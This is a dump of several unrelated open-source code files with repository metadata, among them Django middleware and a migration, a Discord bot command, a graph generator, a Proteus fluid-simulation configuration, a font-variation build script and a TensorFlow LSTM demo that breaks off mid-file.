4cd8533c2ff400fe3f3a9e78e6a145027f886051 | a95f0a79e066393df65c201d10e4ba3a9d44d433 | /pragmatic/middleware.py | 11200e2db6436b5d888c680eff65c2c1b911d811 | [] | no_license | barseghyanartur/django-pragmatic | d2d03a0b61865ec49b11f3eddfa9a2cf705d6945 | b5118e06568ba8c15d129e25fd2ddd3c14648898 | refs/heads/master | 2020-07-27T07:40:12.153629 | 2019-09-12T08:58:55 | 2019-09-12T08:58:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,572 | py | from django.conf import settings
from django.http import HttpResponse
from django.template import loader
from django.template.response import SimpleTemplateResponse
try:
from django.utils.deprecation import MiddlewareMixin
except ImportError: # Django < 1.10
# Works perfectly for everyone using MIDDLEWARE_CLASSES
MiddlewareMixin = object
class MaintenanceModeMiddleware(MiddlewareMixin):
    """Replace every response with a maintenance screen while MAINTENANCE_MODE is on."""

    template_name = 'maintenance_mode.html'

    def process_response(self, request, response):
        # Pass responses through untouched unless maintenance mode is enabled.
        if not getattr(settings, 'MAINTENANCE_MODE', False):
            return response
        # Users listed in MAINTENANCE_MODE_BYPASS_USERS (by pk) skip the screen.
        bypass_ids = getattr(settings, 'MAINTENANCE_MODE_BYPASS_USERS', [])
        if request.user.is_authenticated and request.user.pk in bypass_ids:
            return response
        # Locate the configured context processors (old- and new-style settings).
        try:
            context_processors = settings.TEMPLATE_CONTEXT_PROCESSORS
        except AttributeError:
            context_processors = settings.TEMPLATES[0]['OPTIONS']['context_processors']
        # Render with the request only when a request context processor exists.
        request_processor_enabled = (
            'django.core.context_processors.request' in context_processors
            or 'django.template.context_processors.request' in context_processors
        )
        if request_processor_enabled:
            template = loader.get_template(self.template_name)
            return HttpResponse(template.render({}, request))
        return SimpleTemplateResponse(self.template_name).render()
| [
"erik.telepovsky@gmail.com"
] | erik.telepovsky@gmail.com |
4f66cd817ec45b42e7ca508ed4dc0006558881aa | d92f85e4345a12a245eec8266e14300b8e67d927 | /table print.py | 7c08d1571b9d2bfc3972690d51a55f56aa6b17cb | [] | no_license | ujalapraveen/Function | b13ce92926a3c65ad7f21ba2cb6baed023afa02c | 624145a55774695623a418fcf3a864f11fb6aec2 | refs/heads/main | 2023-06-25T01:40:43.927992 | 2021-07-13T08:41:36 | 2021-07-13T08:41:36 | 371,344,098 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 202 | py |
# Print multiplication tables (1..10) for every number from `num` up to `a`.
num= int(input("enter the number"))  # first table to print
a= int(input("enter the number"))  # last table to print (inclusive)
while num<=a:
    i= 1
    while i<=10:
        s= num*i
        print(num,"x",i,"=",s,"\n")
        i= i+1
    num= num+1
| [
"noreply@github.com"
] | ujalapraveen.noreply@github.com |
1833d5e8f4f06ef245347d7f9c37851e1e26bcc1 | dd70312e98b72c815368398b87dda55da7360b28 | /third-party/thrift/src/thrift/compiler/test/fixtures/patch/gen-py/thrift/annotation/java/constants.py | 0c3d96abb976d502b802bc337851b59efb1b466a | [
"Apache-2.0",
"PHP-3.01",
"MIT",
"Zend-2.0"
] | permissive | paulbiss/hhvm | ca6a8b4ac3e7b65dcf4029f9a59ce591c33c6cce | ddc087ddca8ab6b718c0567ec506139db300fdd1 | refs/heads/master | 2023-05-24T16:27:30.329476 | 2023-05-18T01:01:24 | 2023-05-18T01:01:24 | 63,633,816 | 0 | 0 | null | 2016-07-18T20:12:18 | 2016-07-18T20:12:17 | null | UTF-8 | Python | false | false | 653 | py | #
# Autogenerated by Thrift
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
# @generated
#
from __future__ import absolute_import
import sys
from thrift.util.Recursive import fix_spec
from thrift.Thrift import TType, TMessageType, TPriority, TRequestContext, TProcessorEventHandler, TServerInterface, TProcessor, TException, TApplicationException, UnimplementedTypedef
from thrift.protocol.TProtocol import TProtocolException
from json import loads
import sys
if sys.version_info[0] >= 3:
long = int
import thrift.annotation.scope.ttypes
from .ttypes import UTF8STRINGS, Mutable, Annotation, BinaryString, Adapter, Wrapper
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
427743a45872def1a028777615f3412c9b13bb77 | bea159d40d7cedcff3f2edd17965005899d60666 | /cmd/help.py | 74f933bb02068ba176fd26ccf72a91461e969386 | [] | no_license | WaifuHarem/discord-bot | f8ebb7c793e7f1618c933b9e53939fdb8d47cd71 | 9002107776befba5b00d99eba3281b39a47f3018 | refs/heads/master | 2022-11-27T11:42:26.216412 | 2020-08-05T19:15:49 | 2020-08-05T19:15:49 | 275,703,867 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 477 | py | from cmd_core import Cmd
from cmd_proc import CmdProc
# Public chat command that prints help text: generic help when no argument is
# given, otherwise the help for the named command.
@Cmd.metadata(
    perm = [
        Cmd.perm.PUBLIC
    ],
    info = 'Prints help text',
    args = {
        'cmd' : Cmd.arg(str, Cmd.OPTIONAL, 'Command to get help for')
    }
)
async def help(msg, logger, **kargs):
    # NOTE(review): `help` shadows the builtin; kept because the command
    # framework dispatches on the function name.
    cmd_name = Cmd.get(kargs, 'cmd')
    # NOTE(review): `== None` should be `is None` (PEP 8); behavior unchanged here.
    if cmd_name == None:
        await msg.channel.send('TODO: Help text')
        return
    await msg.channel.send(CmdProc.get_help(cmd_name))
return Cmd.ok() | [
"abraker95@gmail.com"
] | abraker95@gmail.com |
f85301e90db4db4e18ca83157c0040231567a14a | 6f7cc1e4ba9a58a8d84ff97d65a8f5a2f2e8fd19 | /src/products/migrations/0029_auto_20151216_0247.py | 3994550d3b479822c7c6713c0b8097cb4358be03 | [
"MIT"
] | permissive | LABETE/digitalmarket | f90f8220fed14f65ab9cabd16d57f00a22b94faf | fc5e81781cbd92535dfe7ecbcc5924058d475a5f | refs/heads/master | 2021-01-10T16:46:51.571972 | 2016-01-25T19:46:59 | 2016-01-25T19:46:59 | 50,375,708 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,167 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
from django.conf import settings
class Migration(migrations.Migration):
    # Replaces the misspelled `ProductRaiting` model: creates the correctly
    # named `ProductRating`, removes the old model's relations, then deletes
    # the old model.  NOTE: auto-generated Django migration -- edit with care.
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('products', '0028_productraiting_product'),
    ]
    operations = [
        migrations.CreateModel(
            name='ProductRating',
            fields=[
                ('id', models.AutoField(auto_created=True, serialize=False, primary_key=True, verbose_name='ID')),
                ('rating', models.IntegerField(blank=True, null=True)),
                ('verified', models.BooleanField(default=False)),
                ('product', models.ForeignKey(to='products.Product')),
                ('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),
            ],
        ),
        # Drop the old model's foreign keys before deleting the model itself.
        migrations.RemoveField(
            model_name='productraiting',
            name='product',
        ),
        migrations.RemoveField(
            model_name='productraiting',
            name='user',
        ),
        migrations.DeleteModel(
            name='ProductRaiting',
        ),
    ]
"eddie.valv@gmail.com"
] | eddie.valv@gmail.com |
3f659e6b4e79f2a9e308aa065deef09c5f9d8873 | d319165fca8067a172fde00f9d058ebc833a5c43 | /cv1/utils/graph_generation/bianconi.py | 3620ef85e768e2d7539f4f06dab7eb9a23d7f1cf | [] | no_license | pro0255/MADII | 208a2c1d6a8b795865bc03beb41f4031e8a71453 | 7e4ab3aa0b506e7e4cc8ce08b681ecded1dd6e9d | refs/heads/master | 2023-04-12T15:29:13.202166 | 2021-04-27T11:24:31 | 2021-04-27T11:24:31 | 340,859,489 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,152 | py | import random
def bianconi(G_0, n, m, P_t):
    """Grow graph G_0 by n vertices, attaching m links per new vertex
    (Bianconi-style model with triangle-closing probability P_t)."""
    G = G_0
    for _ in range(n):
        # New vertex ids continue consecutively after the existing ones.
        new_vertex = len(G)
        # First link attaches uniformly at random; `anchor` is its endpoint.
        G, anchor = first_link(G, new_vertex)
        # Remaining m - 1 links close a triangle around `anchor` w.p. P_t.
        for _ in range(m - 1):
            G = second_link(G, new_vertex, P_t, anchor)
    return G
def first_link(G, adding_vertex):
    """Attach `adding_vertex` to one uniformly chosen existing vertex.

    Returns the (mutated) graph and the chosen endpoint.
    """
    target = random.choice(list(G))
    # Record the edge in both adjacency lists (the graph is undirected).
    G[target].append(adding_vertex)
    G.setdefault(adding_vertex, []).append(target)
    return G, target
def second_link(G, adding_vertex, P, i1):
    """Attach one additional link for `adding_vertex`.

    With probability P the endpoint is drawn from i1's neighbours (closing a
    triangle); otherwise from all vertices.  Vertices already linked to
    `adding_vertex`, the vertex itself and i1 are excluded.
    """
    draw = random.uniform(0, 1)
    linked = G[adding_vertex]
    # Candidate pool depends on whether we close a triangle or link globally.
    pool = G[i1] if draw < P else G.keys()
    candidates = [v for v in pool if v not in linked and v != adding_vertex and v != i1]
    chosen = random.choice(candidates)
    # Record the edge in both adjacency lists (the graph is undirected).
    G[chosen].append(adding_vertex)
    G[adding_vertex].append(chosen)
    return G
| [
"prokop.vojtech@gmail.com"
] | prokop.vojtech@gmail.com |
8ef4373f7b87c866dcb782c0d597d200e0020fb8 | 7366ce3ba86cb6af2e9ee0923d4a74d028f08c72 | /3d/dambreak/twp_navier_stokes_p.py | 40a9fb0fa8012032b4ea02795ef9333476bac737 | [
"MIT"
] | permissive | erdc/air-water-vv | 56b939280d8d9fb81dc13b79a9de5a489e21e350 | f93ff99432703292b1d62c3e9689537eae44e864 | refs/heads/master | 2022-08-21T23:11:16.912042 | 2022-08-11T16:44:47 | 2022-08-11T16:44:47 | 21,613,939 | 5 | 21 | MIT | 2020-11-04T19:00:46 | 2014-07-08T13:36:39 | Python | UTF-8 | Python | false | false | 4,073 | py | from proteus import *
from proteus.default_p import *
from dambreak import *
from proteus.mprans import RANS2P
# Two-phase Navier-Stokes model configuration (flags such as useOnlyVF,
# useRANS and the physical constants come from `dambreak` via the star
# imports above).
LevelModelType = RANS2P.LevelModel
# Index of the level-set model in the model list (None when only VF is used).
if useOnlyVF:
    LS_model = None
else:
    LS_model = 2
# Indices of the two turbulence-closure models; they shift down when only VF
# runs ahead of them and up by one when the domain moves.
if useRANS >= 1:
    Closure_0_model = 5; Closure_1_model=6
    if useOnlyVF:
        Closure_0_model=2; Closure_1_model=3
    if movingDomain:
        Closure_0_model += 1; Closure_1_model += 1
else:
    Closure_0_model = None
    Closure_1_model = None
# RANS2P coefficients: densities/viscosities of the two fluids, gravity, and
# the wiring to the VF/LS/closure models chosen above.
coefficients = RANS2P.Coefficients(epsFact=epsFact_viscosity,
                                   sigma=0.0,
                                   rho_0 = rho_0,
                                   nu_0 = nu_0,
                                   rho_1 = rho_1,
                                   nu_1 = nu_1,
                                   g=g,
                                   nd=nd,
                                   VF_model=1,
                                   LS_model=LS_model,
                                   Closure_0_model=Closure_0_model,
                                   Closure_1_model=Closure_1_model,
                                   epsFact_density=epsFact_density,
                                   stokes=False,
                                   useVF=useVF,
                                   useRBLES=useRBLES,
                                   useMetrics=useMetrics,
                                   eb_adjoint_sigma=1.0,
                                   eb_penalty_constant=weak_bc_penalty_constant,
                                   forceStrongDirichlet=ns_forceStrongDirichlet,
                                   turbulenceClosureModel=ns_closure,
                                   movingDomain=movingDomain)
# Dirichlet boundary conditions for (p, u, v, w): p, u and v are pinned to
# 0.0 on the 'top' boundary only; everywhere else (and for w on every
# boundary) no Dirichlet condition is imposed (implicit None).
def getDBC_p(x,flag):
    if flag == boundaryTags['top']:# or x[2] >= L[2] - 1.0e-12:
        return lambda x,t: 0.0
def getDBC_u(x,flag):
    #return None
    if flag == boundaryTags['top']:# or x[2] >= L[2] - 1.0e-12:
        return lambda x,t: 0.0
def getDBC_v(x,flag):
    #return None
    if flag == boundaryTags['top']:# or x[2] >= L[2] - 1.0e-12:
        return lambda x,t: 0.0
def getDBC_w(x,flag):
    return None
# Component index -> Dirichlet BC function (0=p, 1=u, 2=v, 3=w).
dirichletConditions = {0:getDBC_p,
                       1:getDBC_u,
                       2:getDBC_v,
                       3:getDBC_w}
# Advective flux BCs: zero advective flux on every boundary except 'top'.
def getAFBC_p(x,flag):
    if flag != boundaryTags['top']:# or x[2] < L[2] - 1.0e-12:
        return lambda x,t: 0.0
def getAFBC_u(x,flag):
    if flag != boundaryTags['top']:# or x[2] < L[2] - 1.0e-12:
        return lambda x,t: 0.0
def getAFBC_v(x,flag):
    if flag != boundaryTags['top']:# or x[2] < L[2] - 1.0e-12:
        return lambda x,t: 0.0
def getAFBC_w(x,flag):
    if flag != boundaryTags['top']:# or x[2] < L[2] - 1.0e-12:
        return lambda x,t: 0.0
# Diffusive flux BCs: zero diffusive flux off the 'top' boundary for u and v,
# and on every boundary for w.
def getDFBC_u(x,flag):
    #return lambda x,t: 0.0
    if flag != boundaryTags['top']:# or x[2] < L[2] - 1.0e-12:
        return lambda x,t: 0.0
def getDFBC_v(x,flag):
    #return lambda x,t: 0.0
    if flag != boundaryTags['top']:# or x[2] < L[2] - 1.0e-12:
        return lambda x,t: 0.0
def getDFBC_w(x,flag):
    return lambda x,t: 0.0
advectiveFluxBoundaryConditions = {0:getAFBC_p,
                                   1:getAFBC_u,
                                   2:getAFBC_v,
                                   3:getAFBC_w}
# Diffusive flux BCs keyed by equation index, then component index.
diffusiveFluxBoundaryConditions = {0:{},
                                   1:{1:getDFBC_u},
                                   2:{2:getDFBC_v},
                                   3:{3:getDFBC_w}}
class PerturbedSurface_p:
    # Initial pressure field for a free surface at height `waterLevel`.
    # rho_0/rho_1, g, L and signedDistance come from the star-imported
    # problem setup (`dambreak`).
    def __init__(self,waterLevel):
        self.waterLevel=waterLevel
    def uOfXT(self,x,t):
        # NOTE(review): assumes signedDistance(x) < 0 inside the water phase
        # (column of fluid 1 above the surface plus fluid 0 between the
        # surface and x); confirm the sign convention against dambreak.py.
        if signedDistance(x) < 0:
            return -(L[2] - self.waterLevel)*rho_1*g[2] - (self.waterLevel - x[2])*rho_0*g[2]
        else:
            return -(L[2] - self.waterLevel)*rho_1*g[2]
class AtRest:
    """Zero-valued initial condition (the fluid starts at rest)."""

    def __init__(self):
        pass

    def uOfXT(self, x, t):
        # Identically zero for every point and time.
        return 0.0
# Initial conditions per component: hydrostatic-style pressure (component 0)
# and zero velocity for u, v and w.
initialConditions = {0:PerturbedSurface_p(waterLine_z),
                     1:AtRest(),
                     2:AtRest(),
                     3:AtRest()}
| [
"cekees@gmail.com"
] | cekees@gmail.com |
44231f06b87758929e1f0c8ac466c426e56613b3 | 4daeb9ebf92d9826028a50bf4e4715c1ab145db1 | /Problem-Set/Basic/CMB02/setup.py | eab1c24574e3d3b0b51084bc6df3274791e02ec0 | [] | no_license | Rahul2025/Thesis | 4148653fcc96d623d602ba58e33cc6465d1cd9f5 | df31863194e2e0b69646e3a48fcaf90541a55c2a | refs/heads/master | 2020-05-02T00:48:09.593873 | 2013-04-21T20:23:02 | 2013-04-21T20:23:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 284 | py | # filename : setup.py
from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
ext_modules = [Extension("qq7_tim",["qq7_tim.pyx"])]
setup(
name = 'qq7_tim app',
cmdclass = {'build_ext':build_ext},
ext_modules = ext_modules
) | [
"rahulgupta2025@gmail.com"
] | rahulgupta2025@gmail.com |
df91e4b73c7c761ad92b9cbe3cec04ab0820e5a3 | fc7998b5c544220e149585e83aecd0e7d839cbac | /file_handlers/constants.py | 14cbb1a66c7ce3e0e1b3d45e3f4ac2f8257b4237 | [] | no_license | IgorBolotnikov/karate-cat | 677de2cae874ca1e611bb3d8f8898c42eef808a7 | 54f62c36502ecd568d4545453490476e9d5ce96d | refs/heads/master | 2020-08-08T02:21:05.334408 | 2019-10-14T16:24:39 | 2019-10-14T16:24:39 | 213,675,806 | 0 | 0 | null | 2019-10-14T16:24:40 | 2019-10-08T15:03:17 | null | UTF-8 | Python | false | false | 646 | py | from os import path
BASE_DIR = path.dirname(__file__)
# ===== CSVHandlerMixin CONSTANTS =====
READ = 'r'
WRITE = 'w'
NEWLINE = ''
# ===== SaveFile CONSTANTS =====
SAVE_FILE = BASE_DIR + '/save.csv'
SAVE_HEADERS = ['number', 'name', 'char_class', 'level', 'current_exp',
'wins', 'losses', 'exp_to_levelup', 'exp_cost',
'health', 'strength', 'endurance', 'agility']
SAVE_DELIMITER = ','
SAVE_SLOTS = 5
# ===== CharsFile CONSTANTS =====
CHARS_FILE = BASE_DIR + '/characters.csv'
CHARS_HEADERS = ['class_name', 'description', 'health',
'strength', 'endurance', 'agility']
CHARS_DELIMITER = ','
| [
"igorbolotnikov1993@gmail.com"
] | igorbolotnikov1993@gmail.com |
3672c6325e8a7ec68959e1a5c4e2ac2a68a4a05b | 2d993858f4cf3dad4f67a3cae8d35720f4dea2d3 | /glyphs2gx/glyphs2gx.py | c830bda220e0eb9b6b82f737af6e3803a9f328ce | [] | no_license | behdad/playground | c0889a0b0187a9e9f2eef841023cd679c89c172d | dac6d007feedb6564e5e63eaf906c458246b0e6a | refs/heads/master | 2023-09-05T05:33:42.822972 | 2018-01-21T21:27:26 | 2018-01-21T21:27:51 | 118,373,208 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,878 | py | #!/usr/bin/python
from __future__ import division
import glyphs2ufo.glyphslib
import glyphs2ufo.builder
import cu2qu.ufo
import ufo2ft
import fontmake.font_project
from fontTools.ttLib import TTFont
from fontTools.ttLib.tables._n_a_m_e import NameRecord
from fontTools.ttLib.tables._f_v_a_r import table__f_v_a_r, Axis, NamedInstance
from fontTools.ttLib.tables._g_v_a_r import table__g_v_a_r, GlyphVariation
import warnings
def build_ttfs (srcfile):
    """Compile every master of a .glyphs source into its own TTF file.

    Returns a triple (master_ttfs, masters, instances):
      master_ttfs -- list of written "<Family>-<Style>.ttf" filenames
      masters     -- the in-memory UFO objects, one per master
      instances   -- instance descriptors found in the Glyphs source
    """
    print "Loading Glyphs src `%s' into memory" % srcfile
    src = fontmake.font_project.FontProject.preprocess(srcfile)
    dic = glyphs2ufo.glyphslib.loads(src)
    del src  # free the raw source text early; it can be large

    print "Load into UFO objects"
    masters, instances = glyphs2ufo.builder.to_ufos(dic, include_instances=True)
    del dic

    print("Instances:")
    from pprint import pprint
    pprint(instances)

    # Convert cubic outlines to quadratic while keeping all masters
    # point-compatible (a prerequisite for gvar interpolation later).
    print "Converting masters to compatible quadratics"
    cu2qu.ufo.fonts_to_quadratic(masters, dump_stats=True)

    master_ttfs = []
    for master in masters:
        family = master.info.familyName
        style = master.info.styleName
        fullname = "%s-%s" % (family, style)
        print "Processing master", fullname

        print "Compiling master"
        ttfont = ufo2ft.compileTTF(master)
        outfile = fullname + ".ttf"  # written into the current directory
        ttfont.save(outfile)
        master_ttfs.append(outfile)
    return master_ttfs, masters, instances
def AddName(font, name):
    """(font, "Bold") --> NameRecord

    Append a new Macintosh-platform name record to the font's `name`
    table and return it.  The record gets the next free name ID at or
    above 257 (IDs up to 256 are reserved for standard names).
    """
    nameTable = font.get("name")
    record = NameRecord()
    used_ids = [existing.nameID for existing in nameTable.names]
    record.nameID = max(used_ids + [256]) + 1
    record.string = name.encode("mac_roman")
    # Macintosh platform, Roman encoding, English language.
    record.platformID = 1
    record.platEncID = 0
    record.langID = 0
    nameTable.names.append(record)
    return record
def AddFontVariations(font, axes, instances):
    """Build and attach an `fvar` table to *font*.

    font      -- TTFont to receive the new table (must not have one yet)
    axes      -- dict mapping axis tag -> (name, min, default, max)
    instances -- named instances, either an iterable of
                 (name, coordinates) pairs or a dict mapping
                 name -> coordinates.

    Fix: build_gx passes a plain dict for *instances*; iterating a dict
    yields only its keys, so any non-empty dict would crash on the
    tuple unpacking below.  Accept mappings explicitly.
    """
    assert "fvar" not in font
    fvar = font["fvar"] = table__f_v_a_r()

    for tag in sorted(axes.keys()):
        axis = Axis()
        axis.axisTag = tag
        name, axis.minValue, axis.defaultValue, axis.maxValue = axes[tag]
        # Axis display name goes into the `name` table.
        axis.nameID = AddName(font, name).nameID
        fvar.axes.append(axis)

    if isinstance(instances, dict):
        instances = instances.items()
    for name, coordinates in instances:
        inst = NamedInstance()
        inst.nameID = AddName(font, name).nameID
        inst.coordinates = coordinates
        fvar.instances.append(inst)
def GetCoordinates(font, glyphName):
    """font, glyphName --> glyph coordinates as expected by "gvar" table

    The result includes four "phantom points" for the glyph metrics,
    as mandated by the "gvar" spec.  Returns None when the glyph does
    not exist in the `glyf` table.
    """
    glyphTable = font["glyf"]
    if glyphName not in glyphTable.glyphs: return None
    glyph = glyphTable[glyphName]
    if glyph.isComposite():
        # For composites, variations apply to the (x, y) component offsets.
        coord = [c.getComponentInfo()[1][-2:] for c in glyph.components]
    else:
        coord = list(glyph.getCoordinates(glyphTable)[0])
    # Add phantom points for (left, right, top, bottom) positions.
    horizontalAdvanceWidth, leftSideBearing = font["hmtx"].metrics[glyphName]

    # Bounds may be absent on freshly loaded glyphs; compute on demand.
    if not hasattr(glyph, 'xMin'):
        glyph.recalcBounds(glyphTable)
    leftSideX = glyph.xMin - leftSideBearing
    rightSideX = leftSideX + horizontalAdvanceWidth

    # XXX these are incorrect. Load vmtx and fix.
    # NOTE(review): the vertical phantom points should come from vertical
    # metrics (vmtx/VORG), not the glyph bounding box; the values below are
    # acknowledged placeholders kept until vmtx is loaded.
    topSideY = glyph.yMax
    bottomSideY = -glyph.yMin

    coord.extend([(leftSideX, 0),
                  (rightSideX, 0),
                  (0, topSideY),
                  (0, bottomSideY)])

    return coord
def sub(al, bl):
    """Pairwise-subtract point list *bl* from point list *al*."""
    deltas = []
    for (ax, ay), (bx, by) in zip(al, bl):
        deltas.append((ax - bx, ay - by))
    return deltas
def mul(l, mult):
    """Scale every (x, y) point in *l* by the factor *mult*."""
    scaled = []
    for px, py in l:
        scaled.append((px * mult, py * mult))
    return scaled
def AddGlyphVariations(out, masters, locations, origin_idx):
    """Build the `gvar` table on *out* from the per-master outlines.

    out        -- the base TTFont being turned into a variable font
    masters    -- TTFont objects for every master (same glyph set)
    locations  -- one design-space location dict per master, same order
    origin_idx -- index of the master serving as the neutral/default
    """
    # Make copies for modification
    masters = masters[:]
    locations = [l.copy() for l in locations]

    # Move origin to front
    origin_master = masters[origin_idx]
    origin_location = locations[origin_idx]
    del masters[origin_idx], locations[origin_idx]
    masters.insert(0, origin_master)
    locations.insert(0, origin_location)
    del origin_idx, origin_master, origin_location
    # Neutral is zero from now on

    axis_tags = locations[0].keys()

    # Normalize locations
    # https://github.com/behdad/fonttools/issues/313
    axis_mins = {tag: min(loc[tag] for loc in locations) for tag in axis_tags}
    axis_maxs = {tag: max(loc[tag] for loc in locations) for tag in axis_tags}
    axis_defaults = locations[0]
    for tag in axis_tags:
        minval, maxval, defaultval = axis_mins[tag], axis_maxs[tag], axis_defaults[tag]
        for l in locations:
            v = l[tag]
            # Piecewise-linear map of [min, default, max] onto [-1, 0, +1].
            if v == defaultval:
                v = 0
            elif v < defaultval:
                v = (v - defaultval) / (defaultval - minval)
            else:
                v = (v - defaultval) / (maxval - defaultval)
            l[tag] = v
    del axis_mins, axis_maxs, axis_defaults
    # Locations are normalized now

    # Find new axis mins and maxs (now in normalized -1..+1 space)
    axis_mins = {tag: min(loc[tag] for loc in locations) for tag in axis_tags}
    axis_maxs = {tag: max(loc[tag] for loc in locations) for tag in axis_tags}

    print "Normalized master positions:"
    from pprint import pprint
    pprint(locations)

    assert "gvar" not in out
    gvar = out["gvar"] = table__g_v_a_r()
    gvar.version = 1
    gvar.reserved = 0
    gvar.variations = {}

    for glyph in out.getGlyphOrder():

        allCoords = [GetCoordinates(m, glyph) for m in masters]
        coordsLen = len(allCoords[0])
        # Interpolation requires point-compatible outlines across masters.
        if (any(len(coords) != coordsLen for coords in allCoords)):
            warnings.warn("glyph %s has not the same number of "
                          "control points in all masters" % glyph)
            continue

        gvar.variations[glyph] = []

        # Subtract origin so every master becomes a delta from neutral.
        allCoords = [sub(coords, allCoords[0]) for coords in allCoords]

        # Add deltas for on-axis extremes
        for tag in axis_tags:
            for value in (axis_mins[tag], axis_maxs[tag]):
                if not value: continue
                # Look up the master sitting exactly at this axis extreme.
                loc = locations[0].copy()
                loc[tag] = value
                idx = locations.index(loc)
                loc, coords = locations[idx], allCoords[idx]
                if not coords:
                    warnings.warn("Glyph not present in a master" + glyph)
                    continue

                # Found master for axis extreme, add delta
                var = GlyphVariation({tag: (min(value, 0.), value, max(value, 0.))}, coords)
                gvar.variations[glyph].append(var)
def glyphs_ufo_get_weight(font):
    """Return the Glyphs 'weightValue' stored in the UFO lib (default 100)."""
    key = glyphs2ufo.builder.GLYPHS_PREFIX + 'weightValue'
    return font.lib.get(key, 100)
def glyphs_ufo_get_width(font):
    """Return the Glyphs 'widthValue' stored in the UFO lib (default 100)."""
    key = glyphs2ufo.builder.GLYPHS_PREFIX + 'widthValue'
    return font.lib.get(key, 100)
def build_gx(master_ttfs, master_ufos):
print "Building GX"
print "Loading TTF masters"
master_fonts = [TTFont(f) for f in master_ttfs]
# Find Regular master
regular_idx = [s.endswith("Regular.ttf") for s in master_ttfs].index(True)
print "Using %s as base font" % master_ttfs[regular_idx]
regular = master_fonts[regular_idx]
regular_weight = glyphs_ufo_get_weight(master_ufos[regular_idx])
regular_width = glyphs_ufo_get_width (master_ufos[regular_idx])
# Set up master locations
master_points = [{'wght': glyphs_ufo_get_weight(m) / regular_weight,
'wdth': glyphs_ufo_get_width (m) / regular_width}
for m in master_ufos]
weights = [m['wght'] for m in master_points]
widths = [m['wdth'] for m in master_points]
print "Master positions:"
from pprint import pprint
pprint(master_points)
# Set up axes
axes = {
'wght': ('Weight', min(weights), weights[regular_idx], max(weights)),
'wdth': ('Width', min(widths), widths [regular_idx], max(widths)),
}
# Set up named instances
instances = {} # None for now
gx = TTFont(master_ttfs[regular_idx])
print "Setting up axes and instances"
AddFontVariations(gx, axes, instances)
print "Setting up glyph variations"
AddGlyphVariations(gx, master_fonts, master_points, regular_idx)
outname = master_ttfs[regular_idx].replace('-Regular', '')
print "Saving GX font", outname
gx.save(outname)
if __name__ == '__main__':
    import sys, pickle
    for src in sys.argv[1:]:
        # Cache intermediate build products next to the source so repeated
        # runs can skip the expensive master-compilation step.  (The dump
        # call is commented out, so the cache is never actually written.)
        pickle_file = src + '.pickle'
        try:
            c = pickle.load(open(pickle_file))
        except (IOError, EOFError):
            c = {}
        if not 'master_ttfs' in c or not 'master_ufos' in c or not 'instances' in c:
            c['master_ttfs'], c['master_ufos'], c['instances'] = build_ttfs(src)
            #pickle.dump(c, open(pickle_file, 'wb'), pickle.HIGHEST_PROTOCOL)
        if not 'gx' in c:
            # NOTE(review): this passes three arguments; build_gx must accept
            # an `instances` parameter for this call to succeed -- confirm.
            c['gx'] = build_gx(c['master_ttfs'], c['master_ufos'], c['instances'])
| [
"behdad@behdad.org"
] | behdad@behdad.org |
d5fe1d9ee281300a6e27b2147bfe23aafa5eb944 | f4c0172e70ca5ffbe01695245e82a28291f88d04 | /v0.5.2/StudyTensroFlow/studyTF_LSTM_demo_me.py | 44b211578b3a7d8f67f36754f7f8496fed0e5405 | [] | no_license | huangxinkid/DeepLearning_Wavelet-LSTM | a84e667d5f2db477ac5a9993d8ae329ec9fd115f | b726f99a8631fc48e6943655ace222b0f6b0290b | refs/heads/master | 2020-03-24T07:11:52.832149 | 2018-05-30T18:43:38 | 2018-05-30T18:43:38 | 142,556,218 | 0 | 1 | null | 2018-07-27T09:21:18 | 2018-07-27T09:21:18 | null | UTF-8 | Python | false | false | 4,658 | py | """ Recurrent Neural Network.
A Recurrent Neural Network (LSTM) implementation example using TensorFlow library.
This example is using the MNIST database of handwritten digits (http://yann.lecun.com/exdb/mnist/)
Links:
[Long Short Term Memory](http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf)
[MNIST Dataset](http://yann.lecun.com/exdb/mnist/).
Author: Aymeric Damien
Project: https://github.com/aymericdamien/TensorFlow-Examples/
"""
from __future__ import print_function
import tensorflow as tf
from tensorflow.contrib import rnn
# Import MNIST data
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("/tmp/data/", one_hot=True)
'''
To classify images using a recurrent neural network, we consider every image
row as a sequence of pixels. Because MNIST image shape is 28*28px, we will then
handle 28 sequences of 28 steps for every sample.
'''
# Training Parameters
learning_rate = 0.001
# training_steps = 10000
training_steps = 10
batch_size = 128
display_step = 200
# Network Parameters
num_input = 28 # MNIST data input (img shape: 28*28)
timesteps = 28 # timesteps
num_hidden = 128 # hidden layer num of features
num_classes = 10 # MNIST total classes (0-9 digits)
# tf Graph input
X = tf.placeholder("float", [None, timesteps, num_input])
Y = tf.placeholder("float", [None, num_classes])
# Define weights
weights = {
'out': tf.Variable(tf.random_normal([num_hidden, num_classes]))
}
biases = {
'out': tf.Variable(tf.random_normal([num_classes]))
}
def RNN(x, weights, biases):
# Prepare data shape to match `rnn` function requirements
# Current data input shape: (batch_size, timesteps, n_input)
# Required shape: 'timesteps' tensors list of shape (batch_size, n_input)
# Unstack to get a list of 'timesteps' tensors of shape (batch_size, n_input)
x = tf.unstack(x, timesteps, 1)
# Define a lstm cell with tensorflow
lstm_cell = rnn.BasicLSTMCell(num_hidden, forget_bias=1.0)
# Get lstm cell output
outputs, states = rnn.static_rnn(lstm_cell, x, dtype=tf.float32)
# Linear activation, using rnn inner loop last output
return tf.matmul(outputs[-1], weights['out']) + biases['out']
logits = RNN(X, weights, biases)
prediction = tf.nn.softmax(logits) # prediction-预测
# Define loss and optimizer
# 定义 损失函数 和 优化器
loss_op = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(
logits=logits, labels=Y))
